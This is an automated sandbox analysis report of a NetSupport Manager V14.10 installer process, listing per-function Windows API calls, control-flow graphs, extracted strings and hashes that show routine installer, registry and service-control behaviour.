                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B1A299
                                                                                                                        • _wcschr.LIBCMT ref: 00B1A2CF
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B1A2E0
                                                                                                                        • wsprintfW.USER32 ref: 00B1A2F4
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00B1A310
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A31A
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00B1A32F
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00B1A340
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00B1A34D
                                                                                                                        • wsprintfW.USER32 ref: 00B1A37F
                                                                                                                        • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 00B1A39A
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A3A5
                                                                                                                        • CloseHandle.KERNEL32(000001F8), ref: 00B1A3B9
                                                                                                                        • wsprintfW.USER32 ref: 00B1A3E9
                                                                                                                        • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 00B1A404
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B1A412
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A420
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A42F
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A43E
                                                                                                                        • CreateThread.KERNELBASE(00000000,00002000,Function_00035A70,00000000,00000000,?), ref: 00B1A45C
                                                                                                                        • SetThreadPriority.KERNELBASE(00000000,00000002), ref: 00B1A46D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$Event$wsprintf$DescriptorErrorLastLocalSecurityThread$AllocCloseCurrentDaclFileFreeHandleInitializeModuleNamePriorityProcess_wcschr
                                                                                                                        • String ID: %s.dmp.%05d$%s.dmp.%d$%s.maxidmp.%d$?????????
                                                                                                                        • API String ID: 2294567594-4071914627
                                                                                                                        • Opcode ID: 691e0e7c403dab505090621cc4e7e03aa52371b5cc750d8eaa6db0c17f3f78a7
                                                                                                                        • Instruction ID: 254d9326bb21581f2dbbaf18d6e001cccbf1f6a5f77238178e42443487e5f5c6
                                                                                                                        • Opcode Fuzzy Hash: 691e0e7c403dab505090621cc4e7e03aa52371b5cc750d8eaa6db0c17f3f78a7
                                                                                                                        • Instruction Fuzzy Hash: 665195B1A40314EBE720ABA0DC8AFD977ACEB44B00F504595F705A72D1DBF46984CF99
                                                                                                                        Function 00B2F225 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 140keyboardregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1323 b2f225-b2f22c 1324 b2f230-b2f245 1323->1324 1324->1324 1325 b2f247-b2f25a call b384df 1324->1325 1328 b2f423-b2f43e LeaveCriticalSection call b382b3 1325->1328 1329 b2f260-b2f26e 1325->1329 1331 b2f270-b2f27d 1329->1331 1331->1331 1333 b2f27f-b2f282 1331->1333 1334 b2f288-b2f28e 1333->1334 1335 b2f43f-b2f44b 1333->1335 1334->1328 1338 b2f294-b2f2a0 call b39583 1334->1338 1336 b2f452-b2f466 call b39583 1335->1336 1337 b2f44d 1335->1337 1336->1328 1345 b2f468-b2f499 call b034a0 1336->1345 1337->1336 1341 b2f2a5-b2f2aa 1338->1341 1343 b2f2b0-b2f2cf call ae1f50 call ae19e0 1341->1343 1344 b2f335-b2f342 GetKeyState 1341->1344 1367 b2f2d1-b2f2e9 call b3a397 1343->1367 1368 b2f31d-b2f322 1343->1368 1347 b2f357-b2f365 1344->1347 1348 b2f344-b2f34b GetKeyState 1344->1348 1354 b2f49b-b2f4ac call b373d1 1345->1354 1355 b2f4af-b2f4b5 1345->1355 1352 b2f370-b2f377 1347->1352 1348->1347 1351 b2f34d 1348->1351 1351->1347 1352->1328 1357 b2f37d-b2f38e 1352->1357 1354->1355 1359 b2f513-b2f532 call b19130 1355->1359 1360 b2f4b7-b2f4d9 call b19130 1355->1360 1362 b2f390 1357->1362 1363 b2f395-b2f3cf wsprintfW RegOpenKeyExW 1357->1363 1379 b2f535-b2f53a 1359->1379 1382 b2f4e0-b2f4e5 1360->1382 1362->1363 1369 b2f3d1-b2f3f9 RegQueryValueExW 1363->1369 1370 b2f419-b2f41d 1363->1370 1388 b2f2f4-b2f30a call b3b0ad 1367->1388 1389 b2f2eb-b2f2f2 1367->1389 1374 b2f324-b2f32a call b38c09 1368->1374 1375 b2f32d-b2f330 call b01dc0 1368->1375 1371 b2f3fb-b2f407 call b38406 1369->1371 1372 b2f40c-b2f413 RegCloseKey 1369->1372 1370->1328 1370->1352 1371->1372 1372->1370 1374->1375 1375->1344 1379->1379 1385 b2f53c-b2f552 call b3762e 1379->1385 1382->1382 1387 b2f4e7-b2f510 call b3762e call b379a7 call b37376 1382->1387 1399 b2f561-b2f583 LeaveCriticalSection call b37376 1385->1399 1400 b2f554-b2f55b OutputDebugStringW 1385->1400 1387->1359 1388->1368 1402 b2f30c-b2f30f 1388->1402 1392 b2f310-b2f31a call b38406 1389->1392 1392->1368 1407 b2f585-b2f58b call b38c09 1399->1407 1408 b2f58e-b2f5a9 call b01dc0 call b382b3 1399->1408 1400->1399 1402->1392 1407->1408
                                                                                                                        APIs
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B2F2DF
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B2F33D
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00B2F346
                                                                                                                        • wsprintfW.USER32 ref: 00B2F3A2
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 00B2F3C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Open__wcsnicmpwsprintf
                                                                                                                        • String ID: @$Log$Log=$SOFTWARE\Productive Computer Insight\%s$winst32$winst32.log$winstall
                                                                                                                        • API String ID: 1795747328-2723375655
                                                                                                                        • Opcode ID: 9c635f39739aacb170f7c02653e91af243e5cb9ac61a2390e43665ddcc082551
                                                                                                                        • Instruction ID: eb4bca6677499fcf18de7f927151a033c642230b279b5f549d80d92105b07cb3
                                                                                                                        • Opcode Fuzzy Hash: 9c635f39739aacb170f7c02653e91af243e5cb9ac61a2390e43665ddcc082551
                                                                                                                        • Instruction Fuzzy Hash: 7F4185B19002169BCF24EB50EC92BFA73F4EB54704F1440F9E60DA7191EBB45A89CB96
                                                                                                                        Function 00B2F6D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1416 b2f6d0-b2f716 GetVersionExW 1417 b2f792-b2f79c 1416->1417 1418 b2f718-b2f73d 1416->1418 1419 b2f7a1-b2f7b6 LoadLibraryW 1417->1419 1420 b2f754 1418->1420 1421 b2f73f-b2f741 1418->1421 1422 b2f7f3-b2f7f9 1419->1422 1423 b2f7b8-b2f7c4 GetProcAddress 1419->1423 1426 b2f757-b2f761 1420->1426 1424 b2f743-b2f74c 1421->1424 1425 b2f74e 1421->1425 1430 b2f7fb-b2f810 GetModuleHandleW GetProcAddress 1422->1430 1431 b2f868-b2f878 call b382b3 1422->1431 1427 b2f7c6-b2f7db GetCurrentProcess 1423->1427 1428 b2f7ea-b2f7f1 FreeLibrary 1423->1428 1424->1425 1424->1426 1425->1420 1426->1419 1429 b2f763-b2f765 1426->1429 1427->1428 1444 b2f7dd-b2f7e7 call b2f030 1427->1444 1428->1422 1433 b2f772 1429->1433 1434 b2f767-b2f770 1429->1434 1435 b2f812-b2f826 GetNativeSystemInfo 1430->1435 1436 b2f85b 1430->1436 1440 b2f778-b2f77b 1433->1440 1434->1433 1434->1440 1441 b2f828-b2f837 1435->1441 1442 b2f839-b2f85a call b2f030 call b382b3 1435->1442 1437 b2f860-b2f865 call b2f030 1436->1437 1437->1431 1445 b2f78a-b2f790 1440->1445 1446 b2f77d-b2f780 1440->1446 1441->1437 1444->1428 1445->1419 1446->1445 1450 b2f782-b2f788 1446->1450 1450->1419
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?,74DF0900,?,00000000), ref: 00B2F6F7
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B2F7A6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00B2F7BE
                                                                                                                        • GetCurrentProcess.KERNEL32(00B92534), ref: 00B2F7CB
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B2F7EB
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00B2F805
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B2F80C
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00B2F819
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CurrentFreeHandleInfoLoadModuleNativeProcessSystemVersion
                                                                                                                        • String ID: GetNativeSystemInfo$GetNativeSystemInfo missing$IsWow64Process$cpu is x64, setting wow64=TRUE$cpu type is %d, probably not x64$iswow64process, setting wow64=TRUE$kernel32.dll
                                                                                                                        • API String ID: 3154316710-1749150432
                                                                                                                        • Opcode ID: ec6e8e0b1570af77135d9135a449fcf538eaef42d97ca78dce3989c08334b5e2
                                                                                                                        • Instruction ID: d0c8b979996ecc689b19bb20c7939406d23ee523c3f0e3c08c8d977c4e18760b
                                                                                                                        • Opcode Fuzzy Hash: ec6e8e0b1570af77135d9135a449fcf538eaef42d97ca78dce3989c08334b5e2
                                                                                                                        • Instruction Fuzzy Hash: 1B412771D00226ABDB149F64BD859BD72F4EB94701F2100FAE41E97270DEB44D818F85
                                                                                                                        Function 00B25490 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 92libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1522 b25490-b254d2 LoadLibraryW 1523 b255b2-b255c1 call b382b3 1522->1523 1524 b254d8-b254eb GetProcAddress 1522->1524 1525 b255b1 1524->1525 1526 b254f1-b25501 GetProcAddress 1524->1526 1525->1523 1526->1525 1528 b25507-b25543 GetUserNameW 1526->1528 1531 b25545-b2554d 1528->1531 1532 b25599 1528->1532 1534 b255aa-b255ab FreeLibrary 1531->1534 1535 b2554f-b25557 1531->1535 1533 b2559f-b255a1 1532->1533 1533->1534 1536 b255a3 1533->1536 1534->1525 1535->1533 1537 b25559 1535->1537 1536->1534 1538 b25560-b25562 1537->1538 1539 b25582-b25596 call b00c30 1538->1539 1540 b25564-b2557e call b2f030 1538->1540 1539->1532 1540->1538 1545 b25580 1540->1545 1545->1532
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNELBASE(NETAPI32), ref: 00B254C8
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,NetUserGetLocalGroups), ref: 00B254E5
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,NetApiBufferFree), ref: 00B254F7
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000050), ref: 00B25515
                                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 00B255AB
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProcwsprintf$FreeLoadLocalNameTimeUser_mallocwvsprintf
                                                                                                                        • String ID: Member of Local Group: %ls$NETAPI32$NetApiBufferFree$NetUserGetLocalGroups$P$e:\nsmsrc\nsm\1410\1410\nt\winst32.c$pTmpBuf != NULL
                                                                                                                        • API String ID: 3527361283-593064418
                                                                                                                        • Opcode ID: 576bcc1bfe8a473f8e4bf9d80280bb99b11953cd47dc9db69ee16c1daf78c72a
                                                                                                                        • Instruction ID: eea2b7c7b5773536aefaaae8cbb9be06f84072b1c5340d14f74f1120ad4cc7a7
                                                                                                                        • Opcode Fuzzy Hash: 576bcc1bfe8a473f8e4bf9d80280bb99b11953cd47dc9db69ee16c1daf78c72a
                                                                                                                        • Instruction Fuzzy Hash: 7931AF71E01738ABDB309B549C45BAEB7B9EF54B00F0141DAF94D63290DBB09E848F92
                                                                                                                        Function 00B2D5A0 Relevance: 126.5, APIs: 20, Strings: 52, Instructions: 525COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 204 b2d5a0-b2d779 call b2b1f0 call b38cd0 call b2f030 call b29630 213 b2d780-b2d78f call b16e30 204->213 216 b2d791-b2d79d 213->216 217 b2d79f-b2d7a6 213->217 218 b2d7c2-b2d7c8 216->218 219 b2d7b6-b2d7bc 217->219 220 b2d7a8-b2d7b4 217->220 221 b2d7d0-b2d7e7 FindWindowW 218->221 219->218 220->218 222 b2d937-b2d950 221->222 223 b2d7ed-b2d815 EnumWindows 221->223 222->221 226 b2d956-b2d95d 222->226 224 b2d817-b2d81e 223->224 225 b2d825-b2d84a 223->225 224->225 227 b2d852-b2d855 225->227 228 b2d84c 225->228 229 b2d96a-b2d97d 226->229 230 b2d95f-b2d964 Sleep 226->230 227->222 231 b2d85b 227->231 228->227 229->213 232 b2d983-b2d997 call b097d0 229->232 230->229 233 b2d862-b2d894 call b2f030 PostMessageW 231->233 234 b2d899-b2d8a3 231->234 235 b2d8ad-b2d8e6 call b2f030 SendMessageTimeoutW 231->235 241 b2dd8d-b2ddbb call b385a6 call b391a1 232->241 242 b2d99d-b2d9d4 GetTickCount 232->242 233->222 234->235 246 b2d8e8-b2d90f GetLastError call b2f030 235->246 247 b2d919-b2d92c call b2f030 235->247 245 b2d9da-b2d9e9 242->245 250 b2d9eb 245->250 251 b2da18-b2da49 call b2d0f0 245->251 246->222 260 b2d911-b2d917 246->260 247->222 256 b2d9f0-b2da10 call b1e8e0 call b37376 250->256 261 b2dbe0 251->261 262 b2da4f-b2da51 251->262 273 b2da12 256->273 260->222 265 b2dbe6-b2dbef 261->265 266 b2da57-b2da6f 262->266 267 b2db5e-b2db8b EnumWindows call b2f030 FindWindowExW 262->267 269 b2dbf1-b2dc11 call b1e8e0 call b37376 265->269 270 b2dc19-b2dc4a call b2d0f0 265->270 266->265 271 b2da75-b2da85 call b384df 266->271 281 b2dba6-b2dbc3 GetLastError call b2f030 267->281 282 b2db8d-b2dba4 call b250d0 FindWindowExW 267->282 302 b2dc13 269->302 283 b2dcba-b2dcc1 270->283 284 b2dc4c-b2dc56 270->284 287 b2da87 271->287 288 b2da8a-b2da9a call b39116 271->288 273->251 300 b2dbd0-b2dbda 281->300 301 b2dbc5-b2dbca Sleep 281->301 282->281 291 b2dcc3-b2dcce 283->291 292 b2dd3f-b2dd8c call b1f5a0 call b37376 call b382b3 283->292 284->283 293 b2dc58 284->293 287->288 307 b2daf8-b2dafc 288->307 308 b2da9c-b2daac call b39116 288->308 297 b2dcd0-b2dcdd 291->297 299 b2dc60-b2dc70 call b25ef0 293->299 297->297 304 b2dcdf-b2dcf0 call b3c0c4 297->304 320 b2dcb2-b2dcb8 299->320 321 b2dc72-b2dc79 299->321 300->245 300->261 301->300 302->270 327 b2dcf2-b2dcfc call b25ef0 304->327 328 b2dcff-b2dd0c 304->328 313 b2db38-b2db40 307->313 314 b2dafe-b2db05 307->314 308->307 324 b2daae-b2dabe call b39116 308->324 313->271 322 b2db46-b2db48 313->322 315 b2db07-b2db0f 314->315 316 b2db1d-b2db24 314->316 315->313 323 b2db11-b2db19 315->323 325 b2db36 316->325 326 b2db26-b2db29 316->326 320->283 320->299 330 b2dc91-b2dc98 321->330 331 b2dc7b-b2dc83 321->331 322->267 332 b2db4a-b2db50 322->332 323->323 333 b2db1b 323->333 324->307 348 b2dac0-b2dad0 call b39116 324->348 325->313 326->325 335 b2db2b-b2db34 326->335 327->328 339 b2dd10-b2dd1d 328->339 341 b2dcb0 330->341 342 b2dc9a 330->342 331->320 338 b2dc85-b2dc8d 331->338 332->267 340 b2db52-b2db58 332->340 333->313 335->325 335->326 338->338 345 b2dc8f 338->345 339->339 346 b2dd1f-b2dd30 call b3c0c4 339->346 340->265 340->267 341->320 347 b2dca0-b2dca3 342->347 345->320 346->292 354 b2dd32-b2dd3c call b25ef0 346->354 347->341 350 b2dca5-b2dcae 347->350 355 b2dad2-b2dad4 348->355 356 b2dad6-b2dae6 call b39116 348->356 350->341 350->347 354->292 355->307 361 b2daf1 356->361 362 b2dae8-b2daef 356->362 361->307 362->307
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B2D74F
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B29630: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B2967A
                                                                                                                          • Part of subcall function 00B29630: GetLastError.KERNEL32 ref: 00B296BB
                                                                                                                          • Part of subcall function 00B29630: OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 00B296DD
                                                                                                                          • Part of subcall function 00B29630: GetLastError.KERNEL32 ref: 00B296E5
                                                                                                                          • Part of subcall function 00B29630: QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2970C
                                                                                                                        • FindWindowW.USER32(?,?), ref: 00B2D7DD
                                                                                                                        • EnumWindows.USER32(Function_000450A0,00000000), ref: 00B2D7FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpenServicewsprintf$EnumFindLocalManagerQueryStatusTimeWindowWindows_malloc_memsetwvsprintf
                                                                                                                        • String ID: $%s %s (%x)...$...Error or timeout, e=%d$...OK$/EC$/ec$Back from Install$C:\Windows\Installer\$CICPLUGIN$CICPLUGIN [loggedonuser]$CICWClass$CloseApps32, prod=%d$Closing$Command Line: %s$Created main window %08x$Done:$Exit$Install Failed$NSM$NSMWClass$NSMWControl32$NSSWControl32$NetSupport Manager for Windows (32 bit) V14.10$OK$P$PCD$PCIAX.DLL$PCIRUNPLUGIN [loggedonuser]$PCIRemoteInstall$PCIVideoPlayer32$Quitting$Quitting %s (%x)...$Restart$Skipping rollback$Start, session=%d, user=%s$Undoing Install$V14.10$V15.10$boot$display.drv$enum msg wnd$enum msg wnd %x failed, e=%d$imhook.dll$module=%s$nslsp.dll$pciappctrl.dll$pciapp~1.dll$pcihooks.dll$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                                                        • API String ID: 3842389883-61307197
                                                                                                                        • Opcode ID: 6a9118510a66d4ea4b0f4c6c93eb65bcb0dacce6c9ac7dbaaebe909244b83fbd
                                                                                                                        • Instruction ID: 77128140245caa8b91587d34a4a7c6ae9d8e895a0615ea3d8bb3eb08eca0ca94
                                                                                                                        • Opcode Fuzzy Hash: 6a9118510a66d4ea4b0f4c6c93eb65bcb0dacce6c9ac7dbaaebe909244b83fbd
                                                                                                                        • Instruction Fuzzy Hash: B92255B19402699FDB31DF18DC45BAABBF4EB05700F1481E9E84DA7251EBB09E84CF91
                                                                                                                        Function 00B2991B Relevance: 79.1, APIs: 24, Strings: 21, Instructions: 305sleepserviceregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 363 b2991b 364 b29920-b2992a 363->364 364->364 365 b2992c-b2997a call b2f030 CreateProcessW 364->365 369 b299b3-b299e3 call ae3da0 * 2 call b16e30 365->369 370 b2997c-b299b0 WaitForSingleObject CloseHandle * 2 call b2f030 365->370 380 b299e5 369->380 381 b299ea-b29a50 call ae3c80 call ae3b70 call b2f030 call ae3b70 call b2f030 ControlService 369->381 370->369 380->381 392 b29a52-b29a67 QueryServiceStatus 381->392 393 b29ac5-b29ade GetLastError call b2f030 Sleep 381->393 395 b29a69 392->395 396 b29a9d-b29ab4 call b2f030 392->396 403 b29ae4-b29b24 call ae3da0 * 2 393->403 399 b29a70-b29a73 395->399 396->403 400 b29a75-b29a94 Sleep QueryServiceStatus 399->400 401 b29a98-b29a9b 399->401 400->399 404 b29a96 400->404 401->396 405 b29ab6-b29ac3 call b2f030 401->405 413 b29b26-b29b29 403->413 414 b29b2f-b29b3f call b2f030 403->414 404->396 405->403 413->414 415 b29d14-b29d54 call b2f030 CloseServiceHandle call b2f030 CloseServiceHandle Sleep 413->415 420 b29b41-b29b52 QueryServiceStatus 414->420 421 b29b96-b29b9d 414->421 434 b29df4-b29e1c call b2f030 call b382b3 415->434 435 b29d5a-b29d5c 415->435 423 b29ba3-b29bbd call b2f030 StartServiceW 420->423 425 b29b54-b29b6a call b2f030 420->425 421->423 424 b29cfd-b29d07 421->424 436 b29bc3-b29be5 call b2f030 QueryServiceStatus 423->436 437 b29ce7-b29cfb GetLastError call b2f030 423->437 428 b29d0c-b29d11 call b2f030 424->428 425->423 439 b29b6c 425->439 428->415 435->434 441 b29d62-b29d8a call b2f030 GetSystemDirectoryW 435->441 453 b29be7-b29bea 436->453 454 b29c18-b29c36 call b2f030 call ae95b0 436->454 437->415 444 b29b70-b29b73 439->444 456 b29d90-b29d9a 441->456 444->421 449 b29b75-b29b92 Sleep QueryServiceStatus 444->449 449->444 450 b29b94 449->450 450->423 457 b29c0f-b29c12 453->457 458 b29bec-b29c0b Sleep QueryServiceStatus 453->458 454->415 471 b29c3c-b29c40 454->471 456->456 460 b29d9c-b29dbd 456->460 457->454 462 b29ce0-b29ce5 457->462 458->453 461 b29c0d 458->461 464 b29dd2 460->464 465 b29dbf-b29dc2 460->465 461->454 462->428 470 b29dd7-b29df1 call b26700 call b3cda8 464->470 468 b29dc4-b29dc9 465->468 469 b29dcb-b29dd0 465->469 468->470 469->470 470->434 471->415 474 b29c46-b29c57 RegisterEventSourceW 471->474 474->415 476 b29c5d-b29c83 GetComputerNameW 474->476 478 b29c85 476->478 479 b29c8a-b29cde wsprintfW ReportEventW DeregisterEventSource 476->479 478->479 479->415
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00B29972
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 00B29988
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B2999B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B299A4
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00B29A48
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29A5C
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29A7A
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29B49
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29B7A
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29B88
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00B29BB5
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29BDA
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29BF1
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29BFF
                                                                                                                        • RegisterEventSourceW.ADVAPI32(00000000,PCIapp), ref: 00B29C4D
                                                                                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00B29C75
                                                                                                                        • wsprintfW.USER32 ref: 00B29C97
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B29D22
